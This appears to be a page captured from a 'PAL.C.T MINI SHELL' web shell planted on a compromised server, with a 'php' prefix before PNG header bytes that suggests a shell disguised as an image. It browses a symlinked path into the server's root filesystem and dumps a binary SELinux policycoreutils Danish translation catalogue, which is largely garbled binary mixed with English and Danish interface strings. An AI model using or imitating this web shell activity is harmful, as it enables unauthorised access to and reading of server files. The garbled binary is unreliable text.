php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /var/www/html/sub/images/sym/root/usr/share/locale/da/LC_MESSAGES/
upload
files >> /var/www/html/sub/images/sym/root/usr/share/locale/da/LC_MESSAGES/policycoreutils.mo

,<*h8i8}8888?8;9&O99v99997:?:C:L:`:s::::::::::;+;<;U;/^;;;;;G;E<$M<)r<M<5<) =lJ=)==2=L2>K>>">
?(?!G?'i?D?B?@A@@4A&7A,^A%A2AAKB5MBTB<BLC(bC,CPC2	D.<DJkD%D(D4E:E]VECE(E!F$FF%G-=GLkGxG1H(=HfHH2HHHH2H#I1<I2nII I"IIJAL
L
MMP&MwMM!MM"MN$NCN-`N%N(N1N*O2:O(mOO%O$OO P>P[P"{P$P!PP%Q'Q GQ hQQQ$QQ%R'R$CRhR$R'RRRS+S@SXSuS"SSS S T'T @TaTzT$TT%TTU3UKU#kUUUUU5V7VVV!uV(V!V"V!W&'WNW$hW/W/W4W2"XUX?oX$X)X)X.(Y,WY)Y)Y.Y,Z)4Z)^Z.Z,Z$Z!	[+[)G[q[v[
[[	[	[[[[\\
\-)\(W\)\2\2\-]*>]*i]%]%]*].^,:^/g^$^/^+^-_+F_+r_'_$_,_-`0F`.w`+`0`4a+8a(da)a+a,a+b#<b%`b#b)b,b+c+-c+Yc-c+c-c-
d.;d(jd-d/d.d$ e)Ee)oe.e-e*e*!f/Lf-|f*f.f2g+7g*cg.g*g0g+h-Eh-sh+h-h,h+(i,Ti)i*i)i&j+'j,Sj*j,j,j+k-1k*_k*k*k*k)l*5l%`l/l-l)l&m/5m-em/m&m0m#n-?n-mn*n)n%n+o-Bo+po$o(o*o*p$@p0ep-p*p#p+q/?q3oq.q&q4q+.r.Zr*r+r+r+s,8s+es/s+s)s-t*Et*pt-t/t)t,#u+Pu/|u0u*u)v.2v-av+v,v.v-w)Ew*ow)w)w,w,xHxQx1px:x9xNyfyxyWy	y2yJz<ezz zz"z+{&K{r{+{#{{!{%|<|X|!u| | |F|
 }+}
?}M}k}	~}}
}}	};}"~%~,~0~6~
Q~
\~j~v~4~~~ ~6Jenw	

<#X	|	

Āր	
+G%SGýӁׁہ'@Ym	

ʂς27C8T8ƃ̓փ!9Wv&Ƅ"(HMbЅ
!<Ibo:7ˆ"@DJcp,FJ&:'<GH($ˊ05O6̋ҋqY`~|,*׍'.*3Y42Ž4E*p'*)R|",	'<Xq}*ܑ'"'Jr]
	rUv̓	.$*S~L%C4_<ѕ0!-_1,4֖#,/(\("ė9PlǘϘטߘ"*#G7k$ڙ#"VF˛B@X*BĜ&C.7rɝޝ
*
2=Vj&ƞ!ݞ5D
aoYU=-]W@0$}U/ӡ!4%PZI$
"2U"p3SǣHdA73W$0-9IHi3b=IV+ާ-
N85/I*7,bA-ѩkOk((.ث-25Jh3*;f5­߭4 )9J3$׮"֯e#2FQO%Dz&#
11c&#8ͳ1189j6C۴1!Q%s(#µ&!
"/%R%x& Ŷ/!'8#`$!/5"Ps%)߸  @Zu%)׹%>]#v$Ժ!/Kh!%)˻"!#:#^;&(*/9+i+'0!/<8l4=ھ8 QJr+3/8M32.72T4094'&\%*		/9ARe1,/:D;1.0)M)w0425:(p513151g+(23!6U4167*1b,/12#1V')'/221e0131.3`33,3)5]4'// 4P30.33M04710Q40613Q31321R2/0/*H1s202	2<1o300070h/0)3$3X/*535Q*6'33E0y/)1361j(,.0!(R4{30'1=5o94*:?1z4011D1v215
1C/u300
3;2o/21.76f0/4331g244/6.f//22([!g4=:O7Y1RMB"'!.*P0{+1+',S+.2NMi 
&6CP=X$
:+"f!<	!=Yf }

H/#
S^kot2)?Hi	

:Wp52
OZ:m>

$;H e/$A+^
)"L]n}D<:#w!,?&@C*yB>&'6#^
:78/h}{!"=`.&$*2GAz45G'o&+.R *%(9Nn
+$%=5c
Ry*W!#EU)]1L6PT(]<>/7gm|_.7*$b2,-".Q p%!  5V]fox	$ $<NV\a%g[(Nk	je~a!l@1CIc&jh'2,;<B(0F]4po%=vs(9/l{y%bC1iCX:$%|ffTHK@7IQ
GH
)s)W&3m.DI]T"vAh5 66F
a
k80uu|RY'*$4zOe !mG8beZq^wS!|YZ
sJzKi5kO(-
Gw*.VUE>;JczV-}=E\PY-+{P1$p<dX,Rg2t[rqU`g<@j^QwS_J+}yFxqyD	B ?xr0i~n_MaK.Tl~v>Sn:UfA+rNn3B_[9)`"dERW]LO5g8?pt\*`bhH>c3N[xu?}6#DM2ZQPo#M#Ad'4o/=/^7\	W,":LtVX;m&L{79%s changed labels.
%s is already in %s%s is not a valid context
%s is not in %s%s must be a directory%s!  Could not get current context for %s, not relabeling tty.
%s!  Could not get new context for %s, not relabeling tty.
%s!  Could not set new context for %s
%s:  Can't load policy and enforcing mode requested:  %s
%s:  Can't load policy:  %s
%s:  Policy is already loaded and initial load requested
******************** IMPORTANT ***********************
...600-1024<b>Applications</b><b>Login Users</b><b>Root Users</b><b>Select:</b><b>TCP Ports</b><b>UDP Ports</b>AddAdd %sAdd Booleans DialogAdd File ContextAdd Network PortAdd SELinux Login MappingAdd SELinux Network PortsAdd SELinux UserAdd SELinux User MappingAdd UserAddr %s is defined in policy, cannot be deletedAddr %s is not definedAdminAdmin User RoleAllAllow SELinux webadm user to manage unprivileged users home directoriesAllow SELinux webadm user to read unprivileged users home directoriesAllow Samba to share nfs directoriesAllow Spam Assassin daemon network accessAllow X-Windows server to map a memory region as both executable and writableAllow all daemons the ability to use unallocated ttysAllow all daemons to write corefiles to /Allow cdrecord to read various content. nfs, samba, removable devices, user temp and untrusted content filesAllow clients to write to X shared memoryAllow daemons to run with NISAllow evolution and thunderbird to read user filesAllow gadmin SELinux user account to execute files in home directory or /tmpAllow guest SELinux user account to execute files in home directory or /tmpAllow java executable stackAllow mount to mount any directoryAllow mount to mount any fileAllow mplayer executable stackAllow normal user to execute pingAllow pppd to be run for a regular userAllow privileged utilities like hotplug and insmod to run unconfinedAllow programs to read files in non-standard locations (default_t)Allow rc scripts to run unconfined, including any daemon started by an rc script that does not have a domain transition explicitly definedAllow regular users direct mouse access (only allow the X server)Allow rpm to run unconfinedAllow sasl authentication server to read /etc/shadowAllow spamd to access home directoriesAllow squid daemon to connect to the networkAllow ssh logins as sysadm_r:sysadm_tAllow ssh to run from inetd instead of as a daemonAllow ssh to run ssh-keysignAllow staff SELinux user account to execute files in home directory or /tmpAllow staff Web Browsers to write to home directoriesAllow staff_r users to search the sysadm home dir and read files (such as ~/.bashrc)Allow stunnel daemon to run as standalone, outside of xinetdAllow sysadm SELinux user account to execute files in home directory or /tmpAllow sysadm_t to directly start daemonsAllow the mozilla browser to read user filesAllow unconfined SELinux user account to execute files in home directory or /tmpAllow unconfined to dyntrans to unconfined_execmemAllow unlabeled packets to flow on the networkAllow user SELinux user account to execute files in home directory or /tmpAllow user to connect to mysql socketAllow user to connect to postgres socketAllow user to r/w noextattrfile (FAT, CDROM, FLOPPY)Allow user to stat ttyfilesAllow user_r to reach sysadm_r via su, sudo, or userhelper. Otherwise, only staff_r can do soAllow users to control network interfaces (also needs USERCTL=true)Allow users to execute the mount commandAllow users to run TCP servers (bind to ports and accept connection from the same domain and outside users)  disabling this forces FTP passive mode and may change other protocolsAllow users to run the dmesg commandAllow users to rw usb devicesAllow xdm logins as sysadm_r:sysadm_tAllow xen to read/write physical disk devicesAllow xguest SELinux user account to execute files in home directory or /tmpAllow xinetd to run unconfined, including any services it starts that do not have a domain transition explicitly definedApplicationAre you sure you want to delete %s '%s'?Bad format %s: Record %sBooleanBoolean %s is defined in policy, cannot be deletedBoolean %s is not definedBoolean NameCVSCan not combine +/- with other types of categoriesCan not have multiple sensitivitiesCan not modify sensitivity levels using '+' on %sCannot find your entry in the shadow passwd file.
Cannot read policy store.Change process mode to enforcingChange process mode to permissive.Changing the policy type will cause a relabel of the entire file system on the next boot. Relabeling takes a long time depending on the size of the file system.  Do you wish to continue?Changing to SELinux disabled requires a reboot.  It is not recommended.  If you later decide to turn SELinux back on, the system will be required to relabel.  If you just want to see if SELinux is causing a problem on your system, you can go to permissive mode which will only log errors and not enforce SELinux policy.  Permissive mode does not require a reboot    Do you wish to continue?Changing to SELinux enabled will cause a relabel of the entire file system on the next boot. Relabeling takes a long time depending on the size of the file system.  Do you wish to continue?CompatibilityConfigue SELinuxContextCopyright (c)2006 Red Hat, Inc.
Copyright (c) 2006 Dan Walsh <dwalsh@redhat.com>Could not add SELinux user %sCould not add addr %sCould not add file context for %sCould not add interface %sCould not add login mapping for %sCould not add port %s/%sCould not add prefix %s for %sCould not add role %s for %sCould not check if SELinux user %s is definedCould not check if addr %s is definedCould not check if boolean %s is definedCould not check if file context for %s is definedCould not check if interface %s is definedCould not check if login mapping for %s is definedCould not check if port %s/%s is definedCould not close descriptors.
Could not commit semanage transactionCould not create SELinux user for %sCould not create a key for %sCould not create a key for %s/%sCould not create addr for %sCould not create context for %sCould not create context for %s/%sCould not create file context for %sCould not create interface for %sCould not create key for %sCould not create login mapping for %sCould not create port for %s/%sCould not create semanage handleCould not delete SELinux user %sCould not delete addr %sCould not delete boolean %sCould not delete file context for %sCould not delete interface %sCould not delete login mapping for %sCould not delete port %s/%sCould not delete the file context %sCould not delete the port %sCould not determine enforcing mode.
Could not establish semanage connectionCould not extract key for %sCould not list SELinux modulesCould not list SELinux usersCould not list addrsCould not list booleansCould not list file contextsCould not list interfacesCould not list local file contextsCould not list login mappingsCould not list portsCould not list roles for user %sCould not list the file contextsCould not list the portsCould not modify SELinux user %sCould not modify addr %sCould not modify boolean %sCould not modify file context for %sCould not modify interface %sCould not modify login mapping for %sCould not modify port %s/%sCould not open file %s
Could not query addr %sCould not query file context %sCould not query file context for %sCould not query interface %sCould not query port %s/%sCould not query seuser for %sCould not query user for %sCould not remove permissive domain %s (remove failed)Could not set MLS level for %sCould not set MLS range for %sCould not set SELinux user for %sCould not set active value of boolean %sCould not set addr context for %sCould not set exec context to %s.
Could not set file context for %sCould not set interface context for %sCould not set mask for %sCould not set message context for %sCould not set mls fields in addr context for %sCould not set mls fields in file context for %sCould not set mls fields in interface context for %sCould not set mls fields in port context for %s/%sCould not set name for %sCould not set permissive domain %s (module installation failed)Could not set port context for %s/%sCould not set role in addr context for %sCould not set role in file context for %sCould not set role in interface context for %sCould not set role in port context for %s/%sCould not set type in addr context for %sCould not set type in file context for %sCould not set type in interface context for %sCould not set type in port context for %s/%sCould not set user in addr context for %sCould not set user in file context for %sCould not set user in interface context for %sCould not set user in port context for %s/%sCould not start semanage transactionCould not test MLS enabled statusCouldn't get default type.
Create/Manipulate temporary files in /tmpCronCurrent Enforcing ModeCustomizedDBUS System DaemonDatabasesDelete %sDelete File ContextDelete Network PortDelete SELinux User MappingDelete UserDescriptionDisable AuditDisable SELinux protection for Cluster ServerDisable SELinux protection for EvolutionDisable SELinux protection for Hal daemonDisable SELinux protection for NIS Password DaemonDisable SELinux protection for NIS Transfer DaemonDisable SELinux protection for NetworkManagerDisable SELinux protection for ThunderbirdDisable SELinux protection for acct daemonDisable SELinux protection for amandaDisable SELinux protection for amavisDisable SELinux protection for apmd daemonDisable SELinux protection for arpwatch daemonDisable SELinux protection for auditd daemonDisable SELinux protection for automount daemonDisable SELinux protection for avahiDisable SELinux protection for bluetooth daemonDisable SELinux protection for canna daemonDisable SELinux protection for cardmgr daemonDisable SELinux protection for ciped daemonDisable SELinux protection for clamd daemonDisable SELinux protection for clamscanDisable SELinux protection for clvmdDisable SELinux protection for comsat daemonDisable SELinux protection for courier daemonDisable SELinux protection for cpucontrol daemonDisable SELinux protection for cpuspeed daemonDisable SELinux protection for crond daemonDisable SELinux protection for cups hplip daemonDisable SELinux protection for cupsd back end serverDisable SELinux protection for cupsd daemonDisable SELinux protection for cupsd_lpdDisable SELinux protection for cvs daemonDisable SELinux protection for cyrus daemonDisable SELinux protection for dbskkd daemonDisable SELinux protection for dbusd daemonDisable SELinux protection for dccdDisable SELinux protection for dccifdDisable SELinux protection for dccmDisable SELinux protection for ddt daemonDisable SELinux protection for devfsd daemonDisable SELinux protection for dhcpc daemonDisable SELinux protection for dhcpd daemonDisable SELinux protection for dictd daemonDisable SELinux protection for distccd daemonDisable SELinux protection for dmesg daemonDisable SELinux protection for dnsmasq daemonDisable SELinux protection for dovecot daemonDisable SELinux protection for entropyd daemonDisable SELinux protection for fetchmailDisable SELinux protection for fingerd daemonDisable SELinux protection for freshclam daemonDisable SELinux protection for fsdaemon daemonDisable SELinux protection for gamesDisable SELinux protection for gpm daemonDisable SELinux protection for gss daemonDisable SELinux protection for hostname daemonDisable SELinux protection for hotplug daemonDisable SELinux protection for howl daemonDisable SELinux protection for http suexecDisable SELinux protection for httpd rotatelogsDisable SELinux protection for hwclock daemonDisable SELinux protection for i18n daemonDisable SELinux protection for imazesrv daemonDisable SELinux protection for inetd child daemonsDisable SELinux protection for inetd daemonDisable SELinux protection for innd daemonDisable SELinux protection for iptables daemonDisable SELinux protection for ircd daemonDisable SELinux protection for irqbalance daemonDisable SELinux protection for iscsi daemonDisable SELinux protection for jabberd daemonDisable SELinux protection for kadmind daemonDisable SELinux protection for klogd daemonDisable SELinux protection for krb5kdc daemonDisable SELinux protection for ktalk daemonsDisable SELinux protection for kudzu daemonDisable SELinux protection for locate daemonDisable SELinux protection for lpd daemonDisable SELinux protection for lrrd daemonDisable SELinux protection for lvm daemonDisable SELinux protection for mailmanDisable SELinux protection for mdadm daemonDisable SELinux protection for monopd daemonDisable SELinux protection for mrtg daemonDisable SELinux protection for mysqld daemonDisable SELinux protection for nagios daemonDisable SELinux protection for named daemonDisable SELinux protection for nessusd daemonDisable SELinux protection for nfsd daemonDisable SELinux protection for nmbd daemonDisable SELinux protection for nrpe daemonDisable SELinux protection for nscd daemonDisable SELinux protection for nsd daemonDisable SELinux protection for ntpd daemonDisable SELinux protection for oddjobDisable SELinux protection for oddjob_mkhomedirDisable SELinux protection for openvpn daemonDisable SELinux protection for pam daemonDisable SELinux protection for pegasusDisable SELinux protection for perdition daemonDisable SELinux protection for portmap daemonDisable SELinux protection for portslave daemonDisable SELinux protection for postfixDisable SELinux protection for postgresql daemonDisable SELinux protection for pptpDisable SELinux protection for prelink daemonDisable SELinux protection for privoxy daemonDisable SELinux protection for ptal daemonDisable SELinux protection for pxe daemonDisable SELinux protection for pyzordDisable SELinux protection for quota daemonDisable SELinux protection for radiusd daemonDisable SELinux protection for radvd daemonDisable SELinux protection for rdiscDisable SELinux protection for readaheadDisable SELinux protection for restorecondDisable SELinux protection for rhgb daemonDisable SELinux protection for ricciDisable SELinux protection for ricci_modclusterdDisable SELinux protection for rlogind daemonDisable SELinux protection for rpcd daemonDisable SELinux protection for rshdDisable SELinux protection for rsync daemonDisable SELinux protection for saslauthd daemonDisable SELinux protection for scannerdaemon daemonDisable SELinux protection for sendmail daemonDisable SELinux protection for setransDisable SELinux protection for setroubleshoot daemonDisable SELinux protection for slapd daemonDisable SELinux protection for slrnpull daemonDisable SELinux protection for smbd daemonDisable SELinux protection for snmpd daemonDisable SELinux protection for snort daemonDisable SELinux protection for sound daemonDisable SELinux protection for soundd daemonDisable SELinux protection for spamd daemonDisable SELinux protection for speedmgmt daemonDisable SELinux protection for squid daemonDisable SELinux protection for ssh daemonDisable SELinux protection for stunnel daemonDisable SELinux protection for swat daemonDisable SELinux protection for sxid daemonDisable SELinux protection for syslogd daemonDisable SELinux protection for system cron jobsDisable SELinux protection for tcp daemonDisable SELinux protection for telnet daemonDisable SELinux protection for tftpd daemonDisable SELinux protection for the web browsersDisable SELinux protection for transproxy daemonDisable SELinux protection for udev daemonDisable SELinux protection for uml daemonDisable SELinux protection for updfstab daemonDisable SELinux protection for uptimed daemonDisable SELinux protection for uucpd daemonDisable SELinux protection for vmware daemonDisable SELinux protection for watchdog daemonDisable SELinux protection for winbind daemonDisable SELinux protection for xdm daemonDisable SELinux protection for xen controlDisable SELinux protection for xen daemonDisable SELinux protection for xfs daemonDisable SELinux protection for ypbind daemonDisable SELinux protection for ypserv daemonDisabledDisabled
Permissive
Enforcing
Do not allow any processes to load kernel modulesDo not allow any processes to modify kernel SELinux policyDo not allow transition to sysadm_t, sudo and su effectedDo not audit things that we know to be broken but which are not security risksEdit Network PortEnable AuditEnable/Disable additional audit rules, that are normally not reported in the log files.EnforcingEnter complete path for executable to be confined.Enter complete path to init script used to start the confined application.Enter unique name for the confined application or user role.Error allocating memory.
Error allocating shell's argv0.
Error changing uid, aborting.
Error connecting to audit system.
Error dropping SETUID capability, aborting
Error dropping capabilities, aborting
Error freeing caps
Error initializing capabilities, aborting.
Error resetting KEEPCAPS, aborting
Error sending audit message.
Error setting KEEPCAPS, aborting
Error setting capabilities, aborting
Error!  Could not open %s.
Error!  Shell is not valid.
Error: multiple levels specified
Error: multiple roles specified
Error: multiple types specified
Error: you are not allowed to change levels on a non secure terminal 
ExecutableExisting User RolesExisting_UserFailed to close tty properly
File
SpecificationFile
TypeFile Contexts fileFile LabelingFile SpecificationFile TypeFile context for %s is defined in policy, cannot be deletedFile context for %s is not definedFilterGPLGamesGenerate new policy moduleGroup ViewHTTPD ServiceInit scriptInteracts with the terminalInterface %s is defined in policy, cannot be deletedInterface %s is not definedInterface fileInternet Services Daemon (inetd)Internet Services Daemon are daemons started by xinetdInvalid file specificationKerberosLabelingLinux Group %s does not existLinux User %s does not existList ViewLoad Policy ModuleLoad policy moduleLockdown...Login
NameLogin '%s' is requiredLogin NameLogin mapping for %s is defined in policy, cannot be deletedLogin mapping for %s is not definedMCS LevelMCS RangeMLSMLS/MLS/
MCS RangeMLS/MCS
LevelMLS/MCS RangeMemory ProtectionMinimal Terminal User RoleMinimal X Windows User RoleModify %sModify File ContextModify SELinux User MappingModify UserModify an existing login user record.Module %s.pp already loaded in current policy.
Do you want to continue?Module NameMountNFSNISNameName ServiceNetwork ConfigurationNetwork PortNo context in file %s
Node Address is requiredNode Netmask is requiredNot yet implementedOptions Error %s Out of memory!
Password:PermissivePolgenPolicy DirectoryPolicy ModulePortPort %s/%s already definedPort %s/%s is defined in policy, cannot be deletedPort %s/%s is not definedPort NumberPort is requiredPort number "%s" is not valid.  0 < PORT_NUMBER < 65536 Ports must be numbers or ranges of numbers from 1 to %d PrefixPrintingProcess DomainProtoProtocolProtocol udp or tcp is requiredRed Hat 2007Relabel on next reboot.Remove loadable policy moduleRequires at least one categoryRequires prefix or rolesRequires prefix, roles, level or rangeRequires setypeRequires setype or serangeRequires setype, serange or seuserRequires seuser or serangeRevert boolean setting to system defaultRoleRoot Admin User RoleRun booleans lockdown wizardSASL authentication serverSELinux
UserSELinux AdministrationSELinux InterfaceSELinux Policy Generation ToolSELinux Port
TypeSELinux Port TypeSELinux RolesSELinux Service ProtectionSELinux TypeSELinux Type is requiredSELinux UserSELinux booleanSELinux fcontextSELinux policy is not managed or store cannot be accessed.SELinux user %s is defined in policy, cannot be deletedSELinux user %s is not definedSELinux user '%s' is requiredSSHSambaSelect Management ObjectSelect PortsSelect Root Administrator User Role, if this user will be used to administer the machine while running as root.  This user will not be able to login to the system directly.Select directory to generate policy files inSelect directory(s) that the confined application owns and writes intoSelect executable file to be confined.Select file(s) that confined application creates or writesSelect if you wish to relabel then entire file system on next reboot.  Relabeling can take a very long time, depending on the size of the system.  If you are changing policy types or going from disabled to enforcing, a relabel is required.Select init script file to be confined.Select the domains that you would like this user administer.Select the user roles that will transiton to this applications domains.Selinux
File TypeSemanage transaction already in progressSemanage transaction not in progressSends audit messagesSends emailSetup ScriptSorry, -l may be used with SELinux MLS support.
Sorry, newrole may be used only on a SELinux kernel.
Sorry, run_init may be used only on a SELinux kernel.
Spam ProtectionSquidStandard Init DaemonStandard Init Daemon are daemons started on boot via init scripts.  Usually requires a script in /etc/rc.d/init.dStatusSystem Default Enforcing ModeSystem Default Policy Type: This user can login to a machine via X or terminal.  By default this user will have no setuid, no networking, no sudo, no suThis user will login to a machine only via a terminal or remote login.  By default this user will have  no setuid, no networking, no su, no sudo.To make this policy package active, execute:Toggle between Customized and All BooleansToggle between Customized and All PortsToggle between all and customized file contextTransition staff SELinux user to Web Browser DomainTransition sysadm SELinux user to Web Browser DomainTransition user SELinux user to Web Browser DomainTransition xguest SELinux user to Web Browser DomainType %s_t already defined in current policy.
Do you want to continue?Type Enforcement fileType is requiredUSAGE: run_init <script> <args ...>
  where: <script> is the name of the init script to run,
         <args ...> are the arguments to that script.USER Types automatically get a tmp typeUnable to allocate memory for new_contextUnable to clear environment
Unable to obtain empty signal set
Unable to restore the environment, aborting
Unable to restore tty label...
Unable to set SIGHUP handler
Universal SSL tunnelUnknown or missing protocolUnreserved Ports (>1024)Usage %s -LUsage %s -L -l userUsage %s -d File ...Usage %s -l -d user ...Usage %s -l CATEGORY user ...Usage %s -l [[+|-]CATEGORY],...]q user ...Usage %s CATEGORY File ...Usage %s [[+|-]CATEGORY],...]q File ...Use -- to end option list.  For exampleUser ApplicationUser Application are any application that you would like to confine that is started by a userUser MappingUser PrivsUser RoleUser with full networking, no setuid applications without transition, no su, can sudo to Root Administration RolesUser with full networking, no setuid applications without transition, no sudo, no su.Uses Pam for authenticationUses dbusUses nsswitch or getpw* callsVerify NameVersionWarning!  Could not retrieve tty information.
Warning! Could not restore context for %s
Web Application/Script (CGI)Web ApplicationsWeb Applications/Script (CGI) CGI scripts started by the web server (apache)Writes syslog messages	XENXServerYou must add at least one role for %sYou must enter a executableYou must enter a name for your confined process/userYou must enter the executable path for your confined processYou must select a userYou must specify one of the following values: %s_Delete_Propertiesallall files
regular file
directory
character device
block device
socket
symbolic link
named pipe
authentication failed.
cannot find valid entry in the passwd file.
chcat -- -CompanyConfidential /docs/businessplan.odtchcat -l +CompanyConfidential jusererror on reading PAM service configuration.
failed to build new range with level %s
failed to convert new context to string
failed to exec shell
failed to get account information
failed to get new context.
failed to get old_context.
failed to initialize PAM
failed to set PAM_TTY
failed to set new range %s
failed to set new role %s
failed to set new type %s
getpass cannot open /dev/tty
globallabel37label38label39label41label42label44label50label59newrole:  %s:  error on line %lu.
newrole: failure forking: %snewrole: incorrect password for %s
newrole: service name configuration hashtable overflow
offonpppdrsyncrun_init: incorrect password for %s
system-config-selinuxtranslator-creditstypeunknownusage:  %s [-qi]
use_syslog must be a boolean value Project-Id-Version: policycoreutils
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2014-10-17 23:48+0000
PO-Revision-Date: 2010-12-21 20:00+0100
Last-Translator: Kris Thomsen <lakristho@gmail.com>
Language-Team: Danish <dansk@dansk-gruppen.dk>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Language: da
%s ændrede mærker.
%s findes allerede i %s%s er ikke en gyldig kontekst
%s findes ikke i %s%s skal være en mappe%s!  Kunne ikke hente aktuel kontekst for %s, ommærker ikke tty.
%s!  Kunne ikke modtage ny kontekst for %s, ommærker ikke tty.
%s!  Kunne ikke sætte ny kontekst for %s
%s:  Kan ikke indlæse regelsæt og anmodet tvungen tilstand:  %s
%s:  Kan ikke indlæse regelsæt:  %s
%s:  Regelsæt er allerede indlæst og første indlæsning anmodet
********************* VIGTIGT ************************
...600-1024<b>Programmer</b><b>Logindbrugere</b><b>Administratorbrugere</b><b>Vælg:</b><b>TCP-porte</b><b>UDP-porte</b>TilføjTilføj %sTilføj Boolesker-dialogTilføj filkontekstTilføj netværksportTilføj SELinux-indlogningstilknytningTilføj SELinux-netværksporteTilføj SELinux-brugerTilføj SELinux-brugertilknytningTilføj brugerAdresse %s er defineret i regelsæt, kan ikke slettesAdresse %s er ikke defineretAdministratorAdministratorbrugerrolleAlleTillad SELinuc-webadministratorbrugeren at håndtere upriviligerede brugeres hjemmemapperTillad SELinux-webadministratorbrugeren at læse upriviligerede brugeres hjemmemapperTillad Samba at dele NFS-mapperTillad Spam Assassin-tjeneste netværksadgangTillad X Windows-server at tilknytte en hukommelsesregion som både kørbar og skrivbarTillad alle tjenester muligheden til at bruge uallokerede tty'erTillad alle tjenester at skrive kernefiler til /Tillad cdrecord at læse forskelligt indhold. nfs, samba, flytbare enheder, bruger midlertidige og ikke betroet indhold-filerTillad klienter at skrive til X-delt hukommelseTillad tjenester at køre med NISTillad Evolution og Thunderbird at læse brugerfilerTillad administrator-SELinux-brugerkonto at køre filer i hjemmemappe eller /tmpTillad gæste-SELinux-brugerkonto at køre filer i hjemmemappe eller /tmpTillad Java-kørbarstakTillad mount at montere enhver mappeTillad mount at montere enhver filTillad mplayer-kørbarstakTillad normal bruger at køre pingTillad pppd at blive kørt for en almindelig brugerTillad priviligerede værktøjer, som f.eks. hotplug og insmod at køre ubegrænsetTillad programmer at læse filer i ikke-standard placeringer (standar_d)Tillad rc-skripter at køre ubegrænset, inklusiv enhver tjeneste startet af et rc-skript som ikke har en domæneoverførsel eksplicit defineretTillad normale brugere direkte museadgang (kun tillad X-serveren)Tillad rpm at køre ubegrænsetTillad SASL-godkendelsesserver at læse /etc/shadowTillad spamd adgang til hjemmemapperTillad squid-tjeneste at forbinde til netværketTillad ssh-indlogninger som sysadm_r:sysadm_tTillad ssh at køre fra inetd istedet for som en tjenesteTillad SSH at køre ssh-keysignTillad stabs-SELinux-brugerkonto at køre filer i hjemmemappe eller /tmpTillad stabs webbrowsere at skrive til hjemmemapperTillad stabsbrugere at søge i systemadministratorens hjemmemappe og læsefiler (f.eks. ~/.bashrc)Tillad stunnel-tjeneste at køre for sig selv, udenfor xinetdTillad systemadministrator-SELinux-brugerkonto at køre filer i hjemmemappe eller /tmpTillad sysadm_t at starte tjenester direkteTillad Mozilla-browseren at læse brugerfilerTillad ubegrænset-SELinux-brugerkonto at køre filer i hjemmemappe eller /tmpTillad ubegrænset at dyntrans til unconfined_execmemTillad umærkede pakker at flyde på netværketTillad bruger-SELinux-brugerkonto at køre filer i hjemmemappe eller /tmpTillad bruger at forbinde til MySQL-sokkelTillad bruger at forbinde til Postgre-sokkelTillad bruger at læse/skrive noextattrfile (FAT, cd-rom, floppy)Tillad bruger at føre statisk over tty-filerTillad bruger at nå systemadministrator via su, sudo eller userhelper. Normalt kan kun staben gøre sådanTillad brugere at håndtere netværksgrænseflader (kræver også USERCTL=true)Tillad brugere at køre mount-kommandoenTillad brugere at køre TCP-servere (forbinde til porte og acceptér forbindelse fra det samme domæne og brugere udenfor)  at deaktivere dette tvinger FTP passivtilstand og kan ændre andre protokollerTillad brugere at køre dmesg-kommandoenTillad brugere at læse/skrive til USB-enhederTillad xdm-indlogninger som sysadm_r:sysadm_tTillad xen at læse/skrive til fysiske diskenhederTillad xgæste-SELinux-brugerkonto at køre filer i hjemmemappe eller /tmpTillad xinetd at køre ubegrænset, inklusiv enhver tjeneste den starter som ikke har en domæneoverførsel eksplicit defineretProgramEr du sikker på at du vil slette %s "%s"?Dårligt format %s: Notér %sBooleskBoolesk %s er defineret i regelsæt, kan ikke slettesBoolesk %s er ikke defineretNavn på booleskCVSKan ikke kombinere +/- med andre typer af kategorierKan ikke have flere følsomhederKan ikke ændre følsomhedsniveau ved at bruge "+" på %sKan ikke finde din post i skyggeadgangskode-filen.
Kan ikke læse regelsætlager.Ændr procestilstand til gennemtvingÆndr procestilstand til tolerant.At ændre regelsættypen vil resultere i en ommærkning af hele filsystemet ved næste opstart. Ommærkning tager lang tid, alt efter størrelsen på filsystemet.  Vil du fortsætte?At ændre til SELinux deaktiveret kræver en genstart.  Dette er ikke anbefalet.  Hvis du senere vælger at aktivere SELinux igen, vil systemet kræver en ommærkning.  Hvis du bare ønsker at se om SELinux er skyld i et problem på dit system, kan du gå i tolerant-tilstand, som kun vil logge fejl og ikke tvinge SELinux-regelsæt  Tolerant-tilstand kræver ikke en genstart    Vil du fortsætte?At ændre til SELinux aktiveret vil resultere i en ommærkning af hele filsystemet ved næste opstart. Ommærkning tager lang tid, alt efter størrelsen på filsystemet.  Vil du fortsætte?KompatibilitetKonfigurér SELinuxKontekstOphavsret (c) 2006 Red Hat, Inc.
Ophavsret (c) 2006 Dan Walsh <dwalsh@redhat.com>Kunne ikke tilføje SELinux-bruger %sKunne ikke tilføje adresse %sKunne ikke tilføje filkontekst for %sKunne ikke tilføje grænseflade %sKunne ikke tilføje indlogningstilknytning for %sKunne ikke tilføje port %s/%sKunne ikke tilføje præfiks %s til %sKunne ikke tilføje rolle %s til %sKunne ikke kontrollere om SELinux-bruger %s er defineretKunne ikke kontrollere om adresse %s er defineretKunne ikke kontrollere om boolesk %s er defineretKunne ikke kontrollere om filkontekst for %s er defineretKunne ikke kontrollere om grænseflade %s er defineretKunne ikke kontrollere om indlogningtilknytning for %s er defineretKunne ikke kontrollere om port %s/%s er defineretKunne ikke lukke deskriptorerne.
Kunne ikke sende semanage-transaktionKunne ikke oprette SELinux-bruger for %sKunne ikke oprette en nøgle til %sKunne ikke oprette en nøgle for %s/%sKunne ikke oprette adresse for %sKunne ikke oprette kontekst for %sKunne ikke oprette kontekst til %s/%sKunne ikke oprette filkontekst for %sKunne ikke oprette grænseflade for %sKunne ikke oprette nøgle til %sKunne ikke oprette indlogningtilknytning for %sKunne ikke oprette port til %s/%sKunne ikke oprette semanage-håndteringKunne ikke fjerne SELinux-bruger %sKunne ikke slette adresse %sKunne ikke slette boolesk %sKunne ikke slette filkontekst for %sKunne ikke slette grænseflade %sKunne ikke slette indlogningstilknytning for %sKan ikke slette port %s/%sKunne ikke slette filkonteksten %sKunne ikke slette porten %sKunne ikke bestemme tvungentilstand.
